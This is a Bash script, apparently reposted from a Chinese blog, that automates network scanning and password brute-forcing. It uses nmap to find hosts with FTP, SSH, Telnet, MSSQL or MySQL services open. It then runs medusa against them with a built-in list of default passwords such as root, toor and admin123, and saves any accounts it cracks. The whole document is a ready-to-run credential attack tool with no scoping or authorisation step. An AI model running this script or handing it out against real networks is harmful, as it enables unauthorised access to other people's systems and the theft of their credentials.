自动扫描和暴力破解

#!/bin/bash
#autonmap.sh :
#Author: Qingzheng
#platform: backtrack5 r3

function Usage(){
    # Print the banner followed by an example of the two prompts.
    # Globals: red, white (read) - colour escape strings set by Main.
    printf '%s\n' \
        "########################################" \
        "#Auto scan and attack                  #" \
        "#autonmap.sh                           #" \
        "#Author: Qingzheng                     #" \
        "########################################"
    # echo -e is kept for the coloured lines so escape sequences stored in
    # $red / $white are interpreted when printed.
    echo -e "${red}Example:"
    printf '%s\n' "Rhost:>> 192.168.0.0/24"
    echo -e "Rport:>> 21 (21/22/23/1433/3306)$white"
    printf '\n'
}



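function DictCreate(){
    # Create ./tmp (relative to the current directory) and seed it with the
    # default user and password wordlists when they are missing.
    # Each file is checked independently, so a missing wordlist is recreated
    # even when ./tmp already exists; existing files are never overwritten.
    # Returns: 0 on success, 1 if the working directory cannot be created.
    local work_dir
    work_dir="$(pwd)/tmp"

    if [ ! -d "$work_dir" ]; then
        # ScanAttack writes scan output and any recovered credentials into
        # this directory, so create it readable by the current user only.
        mkdir -m 700 -- "$work_dir" || return 1
    fi

    if [ ! -e "$work_dir/user.dict" ]; then
        printf '%s\n' root >"$work_dir/user.dict"
    fi

    if [ ! -e "$work_dir/passwd.dict" ]; then
        printf '%s\n' \
            admin \
            administrator \
            administrators \
            root \
            mysql \
            admin123 \
            admini123 \
            toor \
            toor123 \
            mysql \
            mysql123 \
            123456 \
            12345678 >"$work_dir/passwd.dict"
    fi
}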


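function Checknmapmedusa(){
    # Make sure nmap and medusa are available, installing each missing one
    # with apt-get.
    # Globals: blue, white (read) - colour escape strings set by Main.
    # Returns: 0 when both tools are present or were installed, 1 when an
    #          apt-get run fails.
    local tool
    for tool in nmap medusa; do
        # Look the tool up on PATH instead of testing one fixed location, so
        # a copy installed elsewhere is not reinstalled on every run.
        if ! command -v "$tool" >/dev/null 2>&1; then
            echo -e "[$blue>$white] Start install $tool"
            apt-get install -y "$tool" | sed "s/^/[$tool]/g"
            # The pipeline's status is sed's; read apt-get's own status so a
            # failed install is not silently ignored.
            if [ "${PIPESTATUS[0]}" -ne 0 ]; then
                echo -e "[$blue-$white] Failed to install $tool" >&2
                return 1
            fi
        fi
    done
}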




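function ScanAttack(){
    # Scan $Rhost for $Rport with nmap, keep the hosts where the expected
    # service is open, then run medusa against them with the wordlists in
    # ./tmp and append any "ACCOUNT FOUND" lines to ./tmp/output-$Rport.lst.
    # Globals: Rhost, Rport, Rserver, blue, white (read).
    # Returns: 1 when Rhost holds no target, otherwise the status of the
    #          final umask restore.
    local work_dir scan_file hosts_file raw_output results_file saved_umask
    local -a targets

    work_dir="$(pwd)/tmp"
    scan_file="$work_dir/scan-$Rport"
    hosts_file="$work_dir/scan-analyze-$Rport"
    raw_output="$work_dir/output-$Rport"
    results_file="$raw_output.lst"

    # Split the prompt input into separate words here and hand them to nmap
    # as individual arguments. Nothing typed at the prompt is ever passed
    # through a shell, so metacharacters in Rhost cannot run commands.
    read -r -a targets <<<"$Rhost"
    if [ "${#targets[@]}" -eq 0 ]; then
        echo -e "[$blue>$white] Not founding hosts"
        return 1
    fi

    # The files written below end up holding recovered credentials; create
    # them readable by the current user only and restore the umask on exit.
    saved_umask="$(umask)"
    umask 077

    echo -e "[$blue>$white] Starting scan..."
    xterm -geometry 80x20+80+0 -e \
        nmap -v -sS -sV -oG "$scan_file" -p "$Rport" "${targets[@]}"

    # Grepable output: field 2 of each matching line is the host address.
    grep -- "$Rport/open/tcp//$Rserver//" "$scan_file" | cut -d' ' -f2 >"$hosts_file"
    rm -f -- "$scan_file"
    sed "s/^/ >  /g" "$hosts_file"

    if [ -s "$hosts_file" ]; then
        echo -e "[$blue>$white] Straring try crack..."
        xterm -geometry 80x20+80+640 -e \
            medusa -U "$work_dir/user.dict" -P "$work_dir/passwd.dict" -e ns -v 10 \
            -H "$hosts_file" -M "$Rserver" -O "$raw_output"

        if [ -s "$raw_output" ]; then
            grep -- "ACCOUNT FOUND: " "$raw_output" \
                | awk '{print $3,$4,$5,$6,$7,$8,$9}' \
                | sed "s/$Rserver/>/g" \
                | uniq \
                | tee -a "$results_file"
            rm -f -- "$raw_output"
            echo -e "[$blue>$white] Medusa DONE!!"
        else
            echo -e "[$blue-$white] Not founding passwd!!"
        fi
    else
        echo -e "[$blue>$white] Not founding hosts"
    fi

    umask "$saved_umask"
}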



#####################################################################
#####################################################################


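function Main(){
    # Interactive driver: show the banner, prepare the wordlists and tools,
    # then repeatedly prompt for a target and a port and run ScanAttack.
    # Globals written: blue, red, white, underline (colour escapes read by
    # the other functions), Rhost, Rport, Rserver (read by ScanAttack).
    # The loop ends on the first invalid target or unsupported port.

    # Characters accepted in the target prompt: host names, addresses, CIDR
    # suffixes, ranges and space-separated lists. Everything else (shell
    # metacharacters in particular) is refused before it can reach a command.
    local host_re='^[A-Za-z0-9_.:/, -]+$'

    # ANSI colour sequences; the leading \033 is required for echo -e to
    # emit an escape rather than the literal text.
    blue="\033[01;34m"
    red="\033[01;31m"
    white="\033[00m"
    underline="\033[4m"

    Usage
    DictCreate
    Checknmapmedusa

    while true; do
        echo -en "${underline}Rhost$white:$blue>>$white"
        read -r Rhost
        echo -en "${underline}Rport$white:$blue>>$white"
        read -r Rport

        # Refuse empty input, unexpected characters and anything that would
        # be parsed as a command-line option (leading '-').
        if [[ ! $Rhost =~ $host_re || $Rhost == -* ]]; then
            echo -e "[$blue>$white] Input error! Quit!!"
            break
        fi

        # Map the chosen port to the service name expected in the scan
        # output and used as the medusa module.
        case "$Rport" in
            21)   Rserver=ftp ;;
            22)   Rserver=ssh ;;
            23)   Rserver=telnet ;;
            1433) Rserver=mssql ;;
            3306) Rserver=mysql ;;
            *)
                echo -e "[$blue>$white] Input error! Quit!!"
                break
                ;;
        esac

        ScanAttack
    done
}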


#########################################################
#########################################################


# Entry point: start the interactive prompt loop.
Main "$@"

原文地址:https://www.cnblogs.com/caoguo/p/4977692.html